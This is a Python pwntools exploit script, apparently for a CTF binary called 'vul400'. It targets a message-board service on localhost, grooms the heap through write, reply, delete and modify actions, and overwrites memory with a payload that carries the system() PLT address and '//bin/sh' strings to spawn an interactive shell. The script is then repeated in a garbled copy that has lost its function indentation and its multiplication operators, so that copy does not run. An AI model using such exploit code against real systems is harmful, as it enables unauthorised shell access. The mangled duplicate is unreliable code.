otms61/vul400.py

## vul400.py
from pwn import *
from pwnlib.tubes.remote import remote
from struct import pack, unpack
from time import sleep
from pdb import set_trace


t = remote('localhost', 6666, timeout=1000)

WRITE_COMMAND = '1'
READ_COMMAND = '2'
EXIT_COMMAND = '3'

DELETE_COMMAND = '1'
MODIFY_COMMAND = '2'
REPLY_COMMAND = '3'
BACK_COMMAND = '4'

system_plt = 0x8048630

def write(content=' '):
    write.count += 1

    t.sendline(WRITE_COMMAND)
    t.sendline("author_%04i" % write.count)
    t.sendline("title_%04i" % write.count)
    t.sendline(content)

    return str(write.count)
write.count = 0

def reply(number, range_n = 1):
    t.sendline(READ_COMMAND)
    t.sendline(number)
    t.sendline(REPLY_COMMAND)
    for _ in range(range_n):
        t.sendline('//bin/sh')
    t.sendline(BACK_COMMAND)

def delete(number):
    t.sendline(READ_COMMAND)
    t.sendline(number)
    t.sendline(DELETE_COMMAND)
    t.sendline(BACK_COMMAND)

def modify(number):

    t.sendline(READ_COMMAND)
    t.sendline(number)
    t.sendline(MODIFY_COMMAND)
    t.sendline("author_")
    t.sendline("title_%")
    t.sendline(BACK_COMMAND)


def main():
    write()
    sploit = 'a'*36 + pack('<I', 0x80487c4) + 'a'*660 + pack('<I', 0x80487c4) + 'a'*28 + pack('<I', system_plt) + 'a'*3000
    n1 = write(sploit)
    write()
    reply(n1, 255)
    delete(n1)
    n2 = write()
    write()
    reply(n2, 255)
    modify(n2)
    delete(n2)

    t.interactive()

if __name__ == '__main__':
    # set_trace()
    main()
	from pwn import *
	from pwnlib.tubes.remote import remote
	from struct import pack, unpack
	from time import sleep
	from pdb import set_trace


	t = remote('localhost', 6666, timeout=1000)

	WRITE_COMMAND = '1'
	READ_COMMAND = '2'
	EXIT_COMMAND = '3'

	DELETE_COMMAND = '1'
	MODIFY_COMMAND = '2'
	REPLY_COMMAND = '3'
	BACK_COMMAND = '4'

	system_plt = 0x8048630

	def write(content=' '):
	write.count += 1

	t.sendline(WRITE_COMMAND)
	t.sendline("author_%04i" % write.count)
	t.sendline("title_%04i" % write.count)
	t.sendline(content)

	return str(write.count)
	write.count = 0

	def reply(number, range_n = 1):
	t.sendline(READ_COMMAND)
	t.sendline(number)
	t.sendline(REPLY_COMMAND)
	for _ in range(range_n):
	t.sendline('//bin/sh')
	t.sendline(BACK_COMMAND)

	def delete(number):
	t.sendline(READ_COMMAND)
	t.sendline(number)
	t.sendline(DELETE_COMMAND)
	t.sendline(BACK_COMMAND)

	def modify(number):

	t.sendline(READ_COMMAND)
	t.sendline(number)
	t.sendline(MODIFY_COMMAND)
	t.sendline("author_")
	t.sendline("title_%")
	t.sendline(BACK_COMMAND)


	def main():
	write()
	sploit = 'a'36 + pack('<I', 0x80487c4) + 'a'660 + pack('<I', 0x80487c4) + 'a'28 + pack('<I', system_plt) + 'a'3000
	n1 = write(sploit)
	write()
	reply(n1, 255)
	delete(n1)
	n2 = write()
	write()
	reply(n2, 255)
	modify(n2)
	delete(n2)

	t.interactive()

	if __name__ == '__main__':
	# set_trace()
	main()